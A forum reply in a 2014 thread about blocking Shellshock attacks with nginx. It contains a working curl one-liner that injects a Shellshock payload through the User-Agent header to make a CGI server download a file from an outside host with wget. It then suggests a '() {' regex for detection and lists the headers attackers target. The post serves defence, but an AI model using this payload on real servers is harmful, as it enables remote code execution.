Welcome! Log In Create A New Profile

Advanced

Re: Shellshock protection using nginx ?

mex
September 26, 2014 05:23AM
curl -k -H 'User-Agent: () { somedummytext; }; /usr/bin/wget -O /tmp/nastyexe http://myserver.com/nastyexe' https://target.com/cgi-bin/hi

:D


if, you should try to match for (regex-pattern) "\(\) {"
#since this must be written like this;
an additional space between "() {" would render the exploiut non-functional

further more: you are missing all headers; attacks i've seen so far worked angainst
- UA
- cookies
- custom headers

customized attacks might work via POST-BODY too, but this is yet not confirmed
Subject Author Posted

Shellshock protection using nginx ?

Anonymous User September 26, 2014 04:02AM

Re: Shellshock protection using nginx ?

itpp2012 September 26, 2014 05:14AM

Re: Shellshock protection using nginx ?

mex September 26, 2014 05:23AM

Re: Shellshock protection using nginx ?

mex September 26, 2014 05:16AM



Sorry, only registered users may post in this forum.

Click here to login

Online Users

Guests: 71
Record Number of Users: 6 on February 13, 2018
Record Number of Guests: 421 on December 02, 2018
Powered by nginx      Powered by FreeBSD      PHP Powered      Powered by MariaDB      ipv6 ready